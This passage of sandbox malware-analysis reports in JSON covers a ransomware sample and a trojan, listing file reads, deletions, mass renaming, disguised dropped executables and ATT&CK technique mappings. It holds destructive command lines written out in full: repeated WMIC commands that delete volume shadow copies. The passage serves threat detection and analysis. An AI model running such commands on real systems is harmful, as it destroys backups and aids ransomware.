Service\\updater.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\ProgramData\\KMSAutoS\\kmsauto.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Users\\%OSUSER%\\ntuser.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Users\\Public\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\HNC\\HCell80\\PrivateInfo.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\HNC\\HShow80\\PrivateInfo.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\HNC\\Hwp80\\BlogServiceInfo.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\HNC\\Hwp80\\CertIssue.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\HNC\\Hwp80\\PrivateInfo.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\browser\\crashreporter-override.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"C:\\Program Files\\Mozilla Firefox\\uninstall\\shortcuts_log.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has an entrypoint in section \"5xsnjk5u\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"HncATLExt80.enu\" has type \"DOS executable (COM 0x8C-variant)\"- Location: [%PROGRAMFILES%\\HNC\\Common80\\HncATLExt80.enu]- [targetUID: 00000000-00005716]\n \"OBugJFL1LUBK4T.img\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\OBugJFL1LUBK4T.img]- [targetUID: 00000000-00005716]\n \"nyjZw30AWbZ.txt\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\nyjZw30AWbZ.txt]- [targetUID: 00000000-00005716]\n \"DISMHOST.EXE.67A69857.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Deup.pdf\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\Deup.pdf]- [targetUID: 00000000-00005716]\n \"FontConstants.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Include\\FontConstants.au3]- [targetUID: 00000000-00005716]\n \"dictionary.alcatel-lucent.aaa\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa]- [targetUID: 00000000-00005716]\n \"_GUICtrlRebar_DeleteBand.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlRebar_DeleteBand.au3]- [targetUID: 00000000-00005716]\n \"_GUICtrlTreeView_GetItemParam.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlTreeView_GetItemParam.au3]- [targetUID: 00000000-00005716]\n \"_GUICtrlMonthCal_SetMaxSelCount.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlMonthCal_SetMaxSelCount.au3]- [targetUID: 00000000-00005716]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has section name 5xsnjk5u with entropy \"6.49901323093\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has section name ch2tkgem with entropy \"6.36995007296\"\n \"DISMHOST.EXE.67A69857.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A69857.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-22", "type": 8, "relevance": 10, "name": "The analysis extracted file with a known ransomware suffix", "description": "Found dropped filename \"dictionary.alcatel-lucent.aaa\" which has been seen in the context of ransomware (Indicator: .aaa)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%PROGRAMFILES%\\HNC\\Common80\\HncATLExt80.enu\" has high entropy 7.73887221929014\n Dropped file \"%USERPROFILE%\\Downloads\\OBugJFL1LUBK4T.img\" has high entropy 7.999729092963754\n Dropped file \"%USERPROFILE%\\Downloads\\nyjZw30AWbZ.txt\" has high entropy 7.999684737811719\n Dropped file \"%USERPROFILE%\\Downloads\\Deup.pdf\" has high entropy 7.997370010874953\n Dropped file \"%PROGRAMFILES%\\AutoIt3\\Include\\FontConstants.au3\" has high entropy 7.944887662182639\n Dropped file \"%PROGRAMFILES%\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa\" has high entropy 7.949085289542634\n Dropped file \"%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlRebar_DeleteBand.au3\" has high entropy 7.929060768011185\n Dropped file \"%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlTreeView_GetItemParam.au3\" has high entropy 7.920845712868913\n Dropped file \"%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlMonthCal_SetMaxSelCount.au3\" has high entropy 7.8418405896205154", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\dotnet.au3\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\desktop.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Users\\desktop.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\7-zip.chm\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\7z.sfx\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\7zCon.sfx\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\descript.ion\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\History.txt\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\7-Zip\\License.txt\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\AutoIt3\\Au3Check.dat\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\AutoIt3\\AutoIt v3 Website.url\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\AutoIt3\\AutoIt.chm\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\CCleaner\\cc_config.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\CCleaner\\winapp2.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\Accessible.tlb\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\application.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\crashreporter.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\dependentlibs.list\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\firefox.VisualElementsManifest.xml\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\freebl3.chk\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\install.log\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\nssdbm3.chk\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\omni.ja\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\platform.ini\" with delete access\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" opened \"C:\\Program Files\\Mozilla Firefox\\precomplete\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-200", "type": 6, "relevance": 10, "name": "Renames many files with double extensions (often indicator of ransomware infection)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renames more than 100 files with extension \".cab.MRBNY\"", "origin": "API Call", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (UID: 00000000-00005716)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" (UID: 00000000-00006072)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" (UID: 00000000-00005348)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" (UID: 00000000-00003036)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" (UID: 00000000-00004432)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" (UID: 00000000-00004464)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" (UID: 00000000-00000848)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete\" (UID: 00000000-00001580)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete\" (UID: 00000000-00000312)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" (UID: 00000000-00000860)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" (UID: 00000000-00003424)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete\" (UID: 00000000-00005880)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete\" (UID: 00000000-00002948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "binary-28", "type": 8, "relevance": 10, "name": "Drops executable file with image/text extension", "description": "\"nyjZw30AWbZ.txt\" has type \"DOS executable (COM)\" and unusual extension \"txt\"", "origin": "Binary File", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-4", "type": 9, "relevance": 10, "name": "Deletes volume snapshots (often used by ransomware)", "description": "Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" (UID: 00000000-00005348)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" (UID: 00000000-00004432)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" (UID: 00000000-00000848)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete\" (UID: 00000000-00000312)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" (UID: 00000000-00003424)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete\" (UID: 00000000-00002948)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e
https://hybrid-analysis.com/sample/caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e
Hybrid Analysis - Ransomware
{"size": 606112, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e", "sha256": "caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e", "av_detect": 89, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 165, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606116, "sha256": "1b232523f228eb47af43cd76b0d113a42b3198c261a4e86721139ab84d38221e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 4844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004952", "name": "caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe", "normalized_path": "C:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe", "sha256": "caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e"}, {"uid": "00000000-00004844", "parentuid": "00000000-00004952", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe *", "sha256": "1b232523f228eb47af43cd76b0d113a42b3198c261a4e86721139ab84d38221e"}, {"uid": "00000000-00002432", "parentuid": "00000000-00004844", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZVRVVG", "sha256": "1b232523f228eb47af43cd76b0d113a42b3198c261a4e86721139ab84d38221e"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": 